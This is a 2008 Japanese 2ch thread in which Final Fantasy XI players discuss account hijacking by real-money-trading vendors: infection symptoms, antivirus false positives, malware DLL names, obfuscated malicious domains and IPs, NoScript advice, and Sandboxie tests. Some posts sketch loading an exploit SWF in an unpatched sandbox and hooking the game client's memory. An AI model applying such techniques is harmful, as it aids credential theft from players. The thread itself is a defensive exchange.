847既にその名前は使われています:2008/08/19(火) 15:07:33 ID:AilT8oLN
オレ、ビシージのときにBGMがたまにループするんだけど…
今のとこスキャンでは何も出たことないんだが、不安になって来たor2
848既にその名前は使われています:2008/08/19(火) 15:08:44 ID:PGdRaaCw
>>846
クリーンインスコしとけ
というかもう新しいPC買ってそれ使え
古い方は情報検索と2ch専用にしとけ
849既にその名前は使われています:2008/08/19(火) 15:14:37 ID:XZaGZzSX
考えてみたら、垢ハックされる前の数日、
プレイオンラインに入る時、なんか凄く重かったな;
あの時吸われてたのか;
850既にその名前は使われています:2008/08/19(火) 15:22:04 ID:sPhXq6u7
>>830 そのキャラの持ち物や価値次第では復元後も狙われると思うぞ?
復元後の最復元は現場無理みたいだから、それを狙ってわざと移転させキャラ売り飛ばすかもな。
851既にその名前は使われています:2008/08/19(火) 15:38:43 ID:SOAjzLX+
>>839 >>850
なるほどなあ ありがとう
852既にその名前は使われています:2008/08/19(火) 16:16:36 ID:pwlHgLuR
>>846
インするだけだったらサポセンに電話して
パス再発行してもらえばインできるようにはなるよ。

引退する気ならそのままPOL解約しちまえばいいんじゃないかな。
853既にその名前は使われています:2008/08/19(火) 16:25:34 ID:w6SO7RbV
アカハック食らったっていうひと達さ、
ただ「;;」とか言うんじゃなくて>>6のテンプレで協力してもらえんのかしら
それで周知のウィルスか新規が現れやがったのかとかさ
ヒントになるし対策や予防になるから
復旧街中のヒマつぶしにでも教えてくれね
854既にその名前は使われています:2008/08/19(火) 17:08:09 ID:cZ9Rebz9
>>847
ループはたぶん関係ないと思うよ
855既にその名前は使われています:2008/08/19(火) 17:11:20 ID:HYYSb48W
>>853
出来ないから「::」とか使ってるんだろw
いまだにクリインスコしたほうがいい?とかレスくるぐらいだし・・・。
856既にその名前は使われています:2008/08/19(火) 17:23:16 ID:AilT8oLN
>>854
ありがとう
前レスとか読んでちょっと安心した。負荷が多いとなるんだな。
857既にその名前は使われています:2008/08/19(火) 17:27:16 ID:S3/yNhrs
自分の場合、>>16のような前兆症状が出てからハックされるまで1ヶ月以上経っていた。

このスレに来て「大丈夫でしょうか;><」とか少しでも不安要素がある人は、
面倒でも即刻クリーンインスコしてパス変更しておくことをお勧めするけどなぁ。
すぐにハックされるとは限らないよ。
858既にその名前は使われています:2008/08/19(火) 17:53:22 ID:zovaKmVX
こんな症状があるんですけど大丈夫でしょうか;;

っていう情報は、バカヤロー的なレスからマジソレヤバイヨ的なレスまで
とにかくなんでも書いて欲しいところはありますね
ハック被害時のテンプレ仕様報告もそうだけど、新種や亜種の発見ヒントが
隠されてるとも限りません
859既にその名前は使われています:2008/08/19(火) 19:20:35 ID:GLVybUzv
もうXREAっていうウィルスでいいよw
860既にその名前は使われています:2008/08/19(火) 19:40:39 ID:7P9lQYik
■はPOLになんか対策したの?

まぁ対策とかされても
正直な感想は>>814なんだけどさ
861既にその名前は使われています:2008/08/19(火) 20:39:07 ID:6IveAHFa
ちょっと前に俺がこのスレで報告したけど
信オンの垢ハックするkernaegh1drv.dll
これは文字列を変えたりして検索しにくくしてるやっかいなやつ
これに感染すると、信オンはエラーの回線切断が多くなる

これがFFに対応したかはわからないが、何もプレイ環境変えてないのに
挙動がおかしくなったりしたら、自分の意図しないシステム変更が行われたと
解釈して警戒した方がいい
862既にその名前は使われています:2008/08/19(火) 20:46:17 ID:teIsHZGI
>>861
FF版もあった(今月頭)し、今はリネージュ2版。
863既にその名前は使われています:2008/08/19(火) 21:02:37 ID:tAMR+fzm
いまさら聞けないことを聞いてみるスレ に先ほど投稿させて頂いたのですが
今FFへインしようとすると、POL-0022 と出て入れなくなってます。

内容文は DNSサーバーへの接続を拒否されました、しばらく時間を置いて〜 
とありました。

昨日の深夜0時、今日へ日付が変わる時にはイン出来ておりました。

当方PS2でプレイをしている身です。
ただの接続障害だったら、お手を煩わせて申し訳ありません。
864既にその名前は使われています:2008/08/19(火) 21:05:19 ID:J9/3IH/Q
ハックを装い別垢に装備預けて、巻き戻してアイテム増やしてるって奴はいるの?
865既にその名前は使われています:2008/08/19(火) 21:05:28 ID:9U6n/Yix
それははっくじゃなくてただの接続の問題
866既にその名前は使われています:2008/08/19(火) 21:07:27 ID:tAMR+fzm
>>865
ありがとうございます。
フレがハッキングに会い、敏感になっておりました。
867既にその名前は使われています:2008/08/19(火) 21:09:32 ID:x05YDKtK
>>864
アクセスログも見られるだろうからハック被害に遭わずにそうすることは多分無理
フレに頼んでハックまがいのことをやったとしても国内なら逮捕されかねないし
868既にその名前は使われています:2008/08/19(火) 21:17:04 ID:V2evZ1wk
一度ハックされた垢でも
PCからXBOXに変えてパスも変えていれば
ログインしても心配ない?
それとも新垢にしないとダメなのかな
869既にその名前は使われています:2008/08/19(火) 21:19:00 ID:x05YDKtK
>>868
PCの方で一切パスを入力していなければ問題ナス
一度被害に遭うともうPCでやるの怖くなるからねー。

ところで「あうと」を変換すると第一候補がAutoだった。
トナメの名残か・・・・
870既にその名前は使われています:2008/08/19(火) 21:53:16 ID:teIsHZGI
871既にその名前は使われています:2008/08/19(火) 22:23:28 ID:XVOVu72N
ノートンが出した警告

Square Enix Co, LTD Playonline Viewerがインターネットにアクセスしようとしています。
プログラム:pol.exe
パス:D:\Program Files\PlayOnline\SquareEnix\PlayOnlineViewer

日付/時間はどうでもいいわな・・・

リモートアドレス:131.107.115.28 : http(80)
ローカルアドレス:(自分のIP) : 1742
プロトコル:TCP(アウトバウンド)

これってアウアウ?;;
872既にその名前は使われています:2008/08/19(火) 22:26:10 ID:PGdRaaCw
>>871
心配なら勉強しろ。勉強して安心しろ
873既にその名前は使われています:2008/08/19(火) 22:27:23 ID:p5J4tpNf
俺のPOLもネットにアクセスするなあ
やっべー感染してんじゃね俺
874既にその名前は使われています:2008/08/19(火) 22:28:21 ID:x05YDKtK
>>871
ぐぐってきたけどそのIP自体はマイクロソフトっぽい

583 :既にその名前は使われています:2008/07/27(日) 18:35:08 ID:JcCznOpR
pol.exeがcrl.microsoft.comに接続しようとしてたんだけど
これ何かわかる方いますか?Outboundだから送信ぽいんですけど・・・

584 :既にその名前は使われています:2008/07/27(日) 18:40:51 ID:OdA/Dphx
>>583
IPアドレス => 「 131.107.115.28 」
ホスト名変換 => 「 crl.microsoft.com 」(※以下改行の関係で略)

590 :既にその名前は使われています:2008/07/27(日) 20:06:36 ID:y1Qq8vPS
>>583
Pol.exeがcrl.microsoft.comに接続しようとしてたん?
一応マイクロソフトの鯖ではあるよ。

DirectXやらDrawやらが読み出されて、そんとき署名確認かなんかでつなぎにいくのかなー。
その場合はPol.exeが見かけ上crl.microsoft.comに繋ぎにいってるようには見えるとは思う。
875既にその名前は使われています:2008/08/19(火) 22:29:21 ID:GLVybUzv
[Querying whois.arin.net]
[whois.arin.net]

OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US   → (アメリカ合衆国)

NetRange: 131.107.0.0 - 131.107.255.255
CIDR: 131.107.0.0/16
NetName: MICROSOFT
NetHandle: NET-131-107-0-0-1
Parent: NET-131-0-0-0-0
876既にその名前は使われています:2008/08/19(火) 22:29:37 ID:orlF/jXs
>>864
ハックを装う馬鹿は国内で今のところいないんじゃねーかな
被害者のアイテム増殖はまぁその見舞金っうかプレイできなかった期間の保証ってことでみのがされているのかなぁ?
877既にその名前は使われています:2008/08/19(火) 22:30:20 ID:GLVybUzv
878既にその名前は使われています:2008/08/19(火) 22:31:01 ID:GLVybUzv
879既にその名前は使われています:2008/08/19(火) 22:39:23 ID:bCsbIYX8
クリーンインストールしてカスペ入れて起動したら

キーロガーを検知しました。プロセスはキーボード入力の出力先を変更しようとしています。
疑わしい動作:keylogger
プロセスを実行します(PID:324)
\PlayOnline\SquareEnix\PlayOnlineViewer\pol.exe

て出た・・・。これヤバイ?
この後の処理候補としては
→処理終了 終了します
→許可 処理を実行します
→信頼ゾーンへ追加 プロセスを実行しますの除外ルールが作成されます
があるんだけど・・・。
880既にその名前は使われています:2008/08/19(火) 22:40:32 ID:ikHAkJIr
>>879
窓つかってんだろ
881既にその名前は使われています:2008/08/19(火) 22:41:42 ID:bCsbIYX8
窓って何?(´・ω・`)
882既にその名前は使われています:2008/08/19(火) 22:42:03 ID:ikHAkJIr
ウィンドウ化してんだろってこと
883既にその名前は使われています:2008/08/19(火) 22:42:14 ID:rXwzbCX+
>871みたいなのってマジで言ってんの?釣り?どっちだ
なんかね、最近もうよくわからんようになってきたんだが・・・
884既にその名前は使われています:2008/08/19(火) 22:42:37 ID:PGdRaaCw
>>879
過去スレ16を参照
ちなみに他のソフトでも引っかかる
885既にその名前は使われています:2008/08/19(火) 22:45:22 ID:bCsbIYX8
過去ログ見れないんで説明をお願いします(´・ω・`)
886既にその名前は使われています:2008/08/19(火) 22:48:29 ID:hLQAHGV0
>>883
釣りでもいいじゃん。少なくてもここで救われる人はいる
嘘なら嘘で それでハックの被害でないわけですし(´Д`)b
887既にその名前は使われています:2008/08/19(火) 22:51:15 ID:ZXV13oAC
過去スレ16のかすぺたんの部分をはるお。


375 :既にその名前は使われています:2008/03/28(金) 20:57:57.99 ID:PVtDW02D
WindowsXP SP2 updateも○
IE7
リアルプレイヤー削除済
PG2導入
カスペルスキートライアル版

この環境で、完全スキャンをかけても感染はなし。
ところが、POL起動>FF11起動すると全画面表示になって最初の「はい」「いいえ」を選ぶところで
プロアクティブディフェンス起動。
キーロガーを検出しました。プロセスはキーボード入力の出力先を変更しようとしています。
疑わしい動作keylogger プロセスを実行します(PID:3208)
C:Program files\PlayOnline\SQUA...\pol.exe

こんな表示出るのだけど大丈夫なのでしょうか・・・
888既にその名前は使われています:2008/08/19(火) 22:52:17 ID:ZXV13oAC
376 :既にその名前は使われています:2008/03/28(金) 21:03:37.47 ID:HB4+BPXL
>>375
pol.exeはカスペに引っかかるらしい
多分その誤作動だとおもうけど断言まではできないなー


377 :既にその名前は使われています:2008/03/28(金) 21:17:22.61 ID:FSlsiE6T
オートログイン機能をonにしていると見た


378 :375:2008/03/28(金) 21:19:03.69 ID:PVtDW02D
>>376
なるほど…
スキャンで感染なかったから安心していたのですが。
原因わかるかでインしないほうがいいのかな。
889既にその名前は使われています:2008/08/19(火) 22:53:05 ID:ZXV13oAC
379 :既にその名前は使われています:2008/03/28(金) 21:23:49.02 ID:NIEYDkXY
かすぺたん<pol.exe これってキーロガーじゃない?いいの?ねえいいの?
君<うーうんそれはFF11といってね、ログインするためにキーボードから入力するんだよ。
でおkじゃないかな。

かすぺが言う、そのファイルが信頼できるものであれば大丈夫でないの。
これ
>C:Program files\PlayOnline\SQUA...\pol.exe

380 :375:2008/03/28(金) 21:32:56.29 ID:PVtDW02D
>>377
言われて見れば…
ソフト導入すれば安全だと思い込んで、オートログイン設定のままでした…

>>379
わかりやすい説明、ありがとうございます。

安心してログインします(オートログインやめて)
助言いただいた皆様、ほんとうにありがとうございます。
890既にその名前は使われています:2008/08/19(火) 22:54:33 ID:zovaKmVX
スレNo.20以前の過去ログは

【FF11】アカウント不正ログイン被害まとめ ttp://ort.sakura.ne.jp/taisai/

にあります
テンプレから外さないほうがよかったかな
891既にその名前は使われています:2008/08/19(火) 23:04:22 ID:K/7vIHPF
C:\Documents and Settings My Documents\受信したファイル\wzcsvbxm.dllKarnaeghDrv.dll って出たんですけど関係ないのですか
892既にその名前は使われています:2008/08/19(火) 23:10:18 ID:bCsbIYX8
な、なるほどヽ(;´Д`)ノ
大丈夫な様で安心して寝れるお。
みんなありり(´・ω・`)
893既にその名前は使われています:2008/08/19(火) 23:35:09 ID:X72S8RF0
>>890
上げて無くていいよ。
ぐぐらない奴にはなに教えても再犯する。

>>891
どうやってでたの?
何のポップアップででた?
894既にその名前は使われています:2008/08/19(火) 23:40:36 ID:K/7vIHPF
ファイル名を指定して実行でマイコンピュータで検索「wzcsvbxm.dll」って入れたら
出てきました。
895既にその名前は使われています:2008/08/19(火) 23:48:50 ID:rXwzbCX+
system32にいたの?だったらアウツじゃね
896既にその名前は使われています:2008/08/19(火) 23:53:14 ID:rXwzbCX+
というか>>891の環境
flashが最新じゃなくてスクリプト全オンなら高確率でさよなら
897既にその名前は使われています:2008/08/19(火) 23:55:08 ID:K/7vIHPF
1回電源切ってからもう一度検索したら消えてました。
・・・何だったんだろ?
898既にその名前は使われています:2008/08/19(火) 23:55:36 ID:KZn6yQAP
>>891
C:\Documents and Settings My Documents\受信したファイル\
ってことは メッセンジャー経由で受信したってことみたいなんだけど
もしそうなら 送信元はどこでしょ?
899既にその名前は使われています:2008/08/19(火) 23:56:36 ID:1lEQFvWG
つーか
「wzcsvbxm.dllKarnaeghDrv.dll」だとか
「ファイル名を指定して実行でマイコンピュータで検索」だとか
支離滅裂にも程があるがな

釣りならもう少し上手くやりなされ
900既にその名前は使われています:2008/08/19(火) 23:59:42 ID:rXwzbCX+
さっきから釣りだかマジだかわからん奴沸いてるがこいつか?w
釣りにしてはあまりにワカメなんで逆にマジなのかとか思ってたがアホくさ
901既にその名前は使われています:2008/08/20(水) 00:04:09 ID:dxWRblDv
ハックの対応を見てスクエニにの対応の底の浅さを目の当たりにしたわけだが、
今回発売するインゲームアイテムの詳細を見てさらにあきれてしまった・・・。
餌を垂らすだけ垂らしておいて、エンチャントを公表しないってどうなのよ(;'Д`)
受付終了した後に「回数制限あります」なんて言いそうで怖いよw
902既にその名前は使われています:2008/08/20(水) 00:05:40 ID:Hv2Ynqi7
最近pc買ったばかりだったので、ごめんなさい。
903既にその名前は使われています:2008/08/20(水) 00:08:52 ID:FIAYpDwD
スレ違いになるけもだけど、
>>901さん その詳細ってどこでみれますか?
904既にその名前は使われています:2008/08/20(水) 00:10:00 ID:7eFo1wmv
>>903
公式
905既にその名前は使われています:2008/08/20(水) 00:11:04 ID:xoYW+K8y
>>903
公式にでちょるよ
906既にその名前は使われています:2008/08/20(水) 00:11:24 ID:GwT9rzgL
>>903
詳細ってほどでもないけど、普通に公式ページのことです。
ttp://www.playonline.com/ff11/topics/special/080818.html

僕もスレ違いのスレ汚しスマソ
907既にその名前は使われています:2008/08/20(水) 00:11:48 ID:FIAYpDwD
ありがとーー!
908既にその名前は使われています:2008/08/20(水) 00:12:36 ID:oHCLEqq8
●● RMT業者の垢ハックが多発している件37 ●●
★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
★前スレ ●● RMT業者の垢ハックが多発している件36 ●● http://changi.2ch.net/test/read.cgi/ogame/1218621315/
■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
 ※xreaサイトのため後日ミラーサイトURLの紹介があちら管理人様よりあると思います
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます) ttp://miku.xrea.jp/
     (xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト(初心者さん向け) ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
【FF11】アカウント不正ログイン被害まとめ(スレNo.20以前の過去ログあり) ttp://ort.sakura.ne.jp/taisai/
★「巻き戻し情報」「スクエニに法的責任を!」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
  別スレ ●● FF11垢ハック巻き戻し状況報告スレ2 ●● http://changi.2ch.net/test/read.cgi/ogame/1218868358/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
  ※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)
909既にその名前は使われています:2008/08/20(水) 00:16:58 ID:oHCLEqq8
次スレの季節も近いので、とりあえず変更Topテンプレ出しておきます
改行の都合で行間がなにもなくてすっごい見づらいですけどm(_ _)m

「【FF11】アカウント不正ログイン被害まとめ」さんのところは
まぁ入れられるだけのスペースはありそうでしたので復活してみました

FF11Warningさんのところのテンプレミラーサイトについては
あちらを回ってみましたがURLを見つけられませんでしたので
まだリンク先はアップされていないのかもしれません
(わたしが見つけられなかっただけならごめんなさいですけど^^;)
910既にその名前は使われています:2008/08/20(水) 00:17:28 ID:yFz3Tt/k
さっきGoblin Clubの納品パターン報告したらPG2が点滅したんで、
開いてみたら、ROwikiで危険ドメインと指定されている
「666■lyzh■com(208■73■210■32)」へのアクセスをブロックしたとの表示が
もしかして、ゴブクラかゴブクラで使ってる広告に何かされたのか?
911既にその名前は使われています:2008/08/20(水) 00:33:13 ID:LbYh2xV6
広告ないよね、あのページ
ってことは・・・?
912既にその名前は使われています:2008/08/20(水) 00:34:44 ID:cc9irU8x
一番下に広告あるよ
今、調べてるけど怪しいものはいまんところ無し
913既にその名前は使われています:2008/08/20(水) 00:37:45 ID:yFz3Tt/k
俺も各ページ見てみてはいるんだが、報告ボタン押した時だけPG2が反応するんだよね
それ以外は無反応なんだが
914既にその名前は使われています:2008/08/20(水) 00:45:43 ID:cc9irU8x
うーん、ゴブクラって今日始めて見たけど
作りが、あんまよろしくないね・・・

とりあえず、DBのテーブル名とカラム名がすぐわかったよ(^-^;
ゴブクラの作者見てるかな?
915既にその名前は使われています:2008/08/20(水) 00:49:06 ID:FIAYpDwD
ちょっと質問なんですが、
イインラインフレームは防げないって友達にいわれたのえすが
今一わからなくて・・・
HP覗いた時点でアウト?HPに付属してある画像や何かしら
覗いたらアウトですか?今では何ググるのも怖いです
916既にその名前は使われています:2008/08/20(水) 00:51:23 ID:DQdsdQrs
ゴブクラの広告に入ってたらかなりやばいな
合成職人してるんだが納品物のチェックのために毎日12時過ぎに見てる
917既にその名前は使われています:2008/08/20(水) 00:52:41 ID:oHCLEqq8
>>915
FirefoxにNoScriptいれて、IFRAMEを不許可にすれば大丈夫ですよ
918既にその名前は使われています:2008/08/20(水) 00:57:40 ID:3PI2lhS+
ゴブクラって合成板に専用の掲示板持ってたはず
そこで警告すれば管理人さんが動いてくれそうだけど
919既にその名前は使われています:2008/08/20(水) 01:04:47 ID:LbYh2xV6
このサイトについて、のところを見れば掲示板につける
けど、以前に間違えている部分を突っ込んでおいたが見向きもされなかったw
その部分未だに間違ったままなんだけど諦めてるwwww
920既にその名前は使われています:2008/08/20(水) 01:06:22 ID:FIAYpDwD
>>917
そうですか、ありがとうございます
921既にその名前は使われています:2008/08/20(水) 01:06:40 ID:ETLZZMwk
かなり回してるけど引かないなあ・・・
922既にその名前は使われています:2008/08/20(水) 01:14:17 ID:jWE8lAsS
>>876
バックアップと被害の時間がずれている以上、絶対厳密に同じには出来ないわけで、
対応するのが大変すぎるというか、無理だから。
923既にその名前は使われています:2008/08/20(水) 01:14:47 ID:oHCLEqq8
>>920
FirefoxのDLはここ↓
Mozilla Japan - Firefox(Ver.3.0.1) = ttp://mozilla.jp/firefox/

NoScriptのDLはここ↓(FirefoxのAdd-onで紹介されてた気もしますけど)
NoScript - NoScript(Ver.1.7.8) = ttp://noscript.net/

導入の仕方は、検索を日本語ページで絞ってみるといろいろ出てきますよ

Firefox+NoScriptで、IFRAME不許可にして罠サイトに突撃してなにも
なかったから大丈夫なはずです
924既にその名前は使われています:2008/08/20(水) 01:50:55 ID:zFz5TVI8
そろそろテンプレ提示に怪しいURL入れる業者が出てくるかもな
925ゴブクラ”管理”者 ◆1Ebj/BJ5c6 :2008/08/20(水) 01:57:06 ID:MEHqX9D6
>>910
原因がわかりましたので報告。
以前納品提携していたFFXI data bankのURLがらみでした。

サイトがなくなったのに納品データを飛ばしていたことと、
該当のドメイン(ffxi-databank■net)が業者に取られたためのようです。

大丈夫だとは思いますが、心配な方はウィルススキャン等を行ったほうが
いいかと思われます。

すでに該当する部分は外しましたので、今後利用する分には問題ありません。
926既にその名前は使われています:2008/08/20(水) 02:00:32 ID:oHCLEqq8
>>925
素早い対応、ありがとうございます
927既にその名前は使われています:2008/08/20(水) 02:07:54 ID:4iRGMCeP
>>925
素早いご対応ありがとうございます

掲示板に書こうかと思いまして、
ヘッダ等調べるために納品報告ボタンを押していたら、
PG2が反応しなくなったので>>910の現象は思い違いかと思ってました。
あと、検証のためとは言え、何度も納品報告ボタンを押して申し訳ないです。
928既にその名前は使われています:2008/08/20(水) 02:13:44 ID:oHCLEqq8
IFRAMEに関して、ウィルス絡みの記事はこれがいいかな

ttp://internet.watch.impress.co.jp/cda/news/2007/12/19/17941.html

ただ、IFRAMEを利用した罠でも、罠の元になる部分はスクリプトなので(IFRAMEは単なる
フレーム表示タグなので、それ自体がスクリプトのような動作をする要素はないはずです)
スクリプトそのものを確実に不許可にしておけば問題はない気がしますけど・・・

ん〜・・・認識が間違っていたら指摘してください
929既にその名前は使われています:2008/08/20(水) 02:24:38 ID:oHCLEqq8
あ〜・・・

バッファオーバーフローによる誤動作にはスクリプトに関係しないのかな・・・
ってことはやっぱりIFRAMEそのものをを不許可にできる環境がいいのか

やっぱりFirefox+NoScript推奨です
930既にその名前は使われています:2008/08/20(水) 02:31:41 ID:ETLZZMwk
>>925
乙。こうやって対応報告してもらえるとすごく助かるなw

sandboxie使ってなかったもんで試してみたよー。
パッチ一切当ててない砂箱+IE6+脆弱持ちFlashPlayerでレジストリ変更jsコード食わせるswf読み込んでみたんだけど。
手を変え品を変えやってみて、砂箱が保持するレジストリ情報やファイル置き換えはされたけども、砂箱の外には今のところ手だせてないな。
まだテスト深度も浅いし、もっともっと追試してからじゃないと安全です!っては言えないけどw
とりあえず俺は、砂箱内で動かしたブラウザでレジストリ変更されたとしても、外のシステムに影響を及ぼせるような穴は今のところ見っけれてないなー。
ただし、垢パクマルウェアに感染した状態の砂箱内でPOL起動すると当然ID/PASS送信するだろうからね。そこは注意。POLが動くか解らないけどもw

サイト見て回るのには砂箱ブラウザで。んで使い終わったら砂箱内データ消去なりすれば、生で見にいくよりは安全じゃないかなーとは思うよー。
931既にその名前は使われています:2008/08/20(水) 03:11:10 ID:oHCLEqq8
sandboxie導入に、少し気になったので検索

Visual C++ Q & A掲示板という掲示板からの記事(少し古いですが)

厳密にはWin32APIでは100%レジストリやIEの履歴などを一切汚さないブラウジングは
実現できないらしいのですが、そのあたりどうなんでしょう
932既にその名前は使われています:2008/08/20(水) 03:20:15 ID:oHCLEqq8
どうやらなんにでも安全ではないようです
こんな記事も見つけました

「Sandboxieの性質上メモリ、ブートセクタ感染などのタイプは対処できないと思います。」

いちおう、導入にはご注意を
933既にその名前は使われています:2008/08/20(水) 03:29:25 ID:gwFLMhFu
>>925
あれ?・・・ってことはFFXI data bankはもう死んでるの?
たしかにグーグル先生でトップに来たURLをソースチェッカーでみたら404で返ってくる。
でも、augseで見るとHPじたいは残ってるっぽい・・・なんじゃこりゃ?
934既にその名前は使われています:2008/08/20(水) 03:36:09 ID:Kx/Xfg2m
キャラデータ復旧申請後
キャラ復活メールくる間に、むこうから連絡くる?
本人確認が完了したので復旧作業を開始しますとか
935既にその名前は使われています:2008/08/20(水) 03:39:09 ID:zFz5TVI8
>>934
こない。
936既にその名前は使われています:2008/08/20(水) 03:39:58 ID:ETLZZMwk
>>931
>厳密にはWin32APIでは100%レジストリやIEの履歴などを一切汚さないブラウジングは
>実現できないらしいのですが、そのあたりどうなんでしょう
それは無理かなー、Sandboxie自体HKUS内にレジストリをミラーリングしてそいつを使うみたいだからレジストリを100%汚さないっていうのは出来てないな。
ここらへんはHIPSで検知されるから挙動を見てみると解りやすいかもねw

>>932はシステム自体がすでに感染してるケースじゃないのかなあ。
システムでメモリを舐めるようなマルウェアに感染してそれが動いていた場合、砂箱の外から中身を見る手段はあると思うよ。ブートセクタ云々は、その名前の通りだけど。
>>930でいってるのはあくまでクリーンな状態のPCでブラウジングする場合の話。
クリーンな状態であって砂箱+ブラウザでもしマルウェアをダウンロードしてしまったとしても、砂箱内で感染状態にはなるだろうけどブラウズ終わったら削除しちゃえば比較的安全だよねってこと。
ダウンロードした時点でサービスなりで起動かけられてPOLのメモリやれレジストリ舐めにいくっていうなら話は別かもしれないけど
少なくとも、自分で手動リカバーかけない限り砂箱外にファイル吐かせたりレジストリを食わせたりってのは俺には出来て無いなあw
937既にその名前は使われています:2008/08/20(水) 03:53:27 ID:oHCLEqq8
>>936
ありがとうございますm(_ _)m

わたしも使おうかと思っていろいろ調べて、なにかあったときに対処が
できなさそうだな〜って思って、結局は躊躇でした
わかってる人が使うなら安全でも(使う「から」安全でも、かな)、ただ
安全だからと導入することへの危惧感がどうにもこうにも・・・

と言ってる間に、ffxi-databank■netを見に行ってる途中で危険サイト指定の
「208●73.210.32」に続いて中国IPの「219●243.201.17」を弾きました

なんだこれ・・・
938既にその名前は使われています:2008/08/20(水) 03:55:11 ID:Kx/Xfg2m
>>935
こないのか、、、昼間とか仕事だから電話かかってきてもとれんし
てか来ないのはそれはそれでダメじゃね?
本人確認完了くらいはしらせてほしいものだが、、、
939既にその名前は使われています:2008/08/20(水) 04:17:32 ID:97RurTrd
>>938
そんな事してたらどれだけオペレーター要ると思って
いつ在宅してるか分からない人間に電話するオペレータ増やすくらいなら電話対応増やす方がいいだろ

オペレータ一人雇うのも馬鹿にならないんだぜ?
940既にその名前は使われています:2008/08/20(水) 04:17:53 ID:zq6TFmWA
POLだけに限った話でいえば、今後の脅威としてdll食わせて起動時に常駐しますってんじゃなくて実行ファイルで即座にPOLのレジストリキーやらディレクトリ舐めにいくーとか手法が先祖帰りした場合。
設定でPOLのディレクトリとレジストリキーをアクセス排他してやればいいんじゃないかなー。まだ試してないけどw

それとちょっと怒られるかもしれないけど、POLのプロセスをHookするプログラムを砂箱内で動かして砂箱外のPOL掴めるか試してみたんだけど確かにメモリ上に展開されたナニは読めないこともないねー。
ただこれも、砂箱を削除してからPOLのログインを行えば上に書いたような実行ファイル形式で即座に動いちゃいます!みたいなナニにも運用上対応はでけるかしら。
俺もまだSandboxieは触り始めたばかりだし、もっとスマートな方法あるかもだけどw
941既にその名前は使われています:2008/08/20(水) 04:24:55 ID:zq6TFmWA
砂箱っていうのは、たとえばうっさんくさいフリーウェアとかを試したいときにシステム汚したくないけど試してみたい!ってときにテスト環境として使う事が多いものだし。
砂箱外のメモリ展開された情報も見に行けるものが多いと思うけど。
そのソフトが一体なんの為のものなのか、どのような挙動をするのか、どのようなケースに有効なのか。ってのを見極めて使う分には割合に有効なんじゃないかねw
>>937のような姿勢は正しいとは思うよw
942937:2008/08/20(水) 04:25:32 ID:oHCLEqq8
調べた結果、中国IPはPlanet-Labでしたm(_ _;m

危険サイトブロック直後に中国IPブロックだったから焦っちゃった
タイミングよすぎ・・・
943937:2008/08/20(水) 04:29:07 ID:oHCLEqq8
>>941
もうちょっと勉強して、自分にも使えそうになったら試してみます
まだまだPlanet-Labさえ調べないと安心できないレベルなので
当分は先になりそうですm(_ _)m
944既にその名前は使われています:2008/08/20(水) 05:07:53 ID:oHCLEqq8
次スレ、立てておきます
945既にその名前は使われています:2008/08/20(水) 05:48:47 ID:oHCLEqq8
次スレ

●● RMT業者の垢ハックが多発している件37 ●●
http://changi.2ch.net/test/read.cgi/ogame/1219176652/
946既にその名前は使われています:2008/08/20(水) 09:05:07 ID:BXNZrbN+
保守
947既にその名前は使われています:2008/08/20(水) 13:44:48 ID:6FDtoe8J
ハックされた人に一番聞きたいのはPCにどんな兆候が現れたか
なんだがあんまり報告無いね
何の症状も出ないって言うのは結構珍しいような気がする
948既にその名前は使われています:2008/08/20(水) 14:10:51 ID:J3FuZfBg
そんなのに引っ掛かるまぬけに期待するだけ無駄。
949既にその名前は使われています:2008/08/20(水) 14:18:17 ID:ZkP/6/3S
たいてい感染している奴は気づいてもいない
950既にその名前は使われています:2008/08/20(水) 14:42:54 ID:n7sRgRj4
そもそもツール経由感染が一切無いわけねーのにそういうのの報告皆無だよな。
つまり大半がツール使った結果感染したけど、
それを言うわけにはいかないから詳細書かないんじゃねえの?
951既にその名前は使われています:2008/08/20(水) 14:52:57 ID:ejwd3G9J
>>950
イメージで話しているだけなんだろうが、わざわざFFのツール作って広めてからハックするよりも
既存の穴を埋めて無いやつをハックするほうが楽だろw
全盛期には日に1000パス抜かれてたらしいし
952既にその名前は使われています:2008/08/20(水) 14:57:38 ID:ucg/NGii
http://headlines.yahoo.co.jp/hl?a=20080820-00000042-zdn_ep-sci

これも新たな火種にならんかな?
953既にその名前は使われています:2008/08/20(水) 14:58:01 ID:v9YB+1nT
こんな記事を発見
URLをコピペしたら悪質サイトに――乗っ取り被害が続出

>どんなサイトのURLをコピーしても、悪質サイトのURLがペーストされてしまう――。
>テキストなどのコピー&ペーストに使われるメモリ領域「クリップボード」が乗っ取られる被害が続出している。
>被害報告はWindows、Macユーザーの両方から寄せられているという。セキュリティ企業の英 Sophosが8月19日のブログで伝えた。

>Sophosによると、ネットの掲示板には被害に遭ったというユーザーからの報告が相次いでいる。
>「URLを選択して“ctrlとc”でコピーし、ペーストしようとするたびに、ウイルスと思われるリンクが出てくる」
>「例えば、http://www.google.com/というURLをWindowsのクリップボードにコピーして、ペーストすると問題のURLになる。
>ウイルス対策ソフトでスキャンしても何も見つからない」などの声が寄せられているという。

>攻撃者はトラフィックを稼ぐ狙いでユーザーのクリップボードを上書きし、自分たちのサイトのURLをペーストさせているとSophosは分析。
>Javascriptなどのスクリプト言語を使って、自動的にデータをシステムのクリップボードにコピーする技術はよく知られているという。

>今回の現象は、被害者が正規サイトを閲覧した後に発生しており、不正スクリプトを仕込んだFlashが使われているもよう。
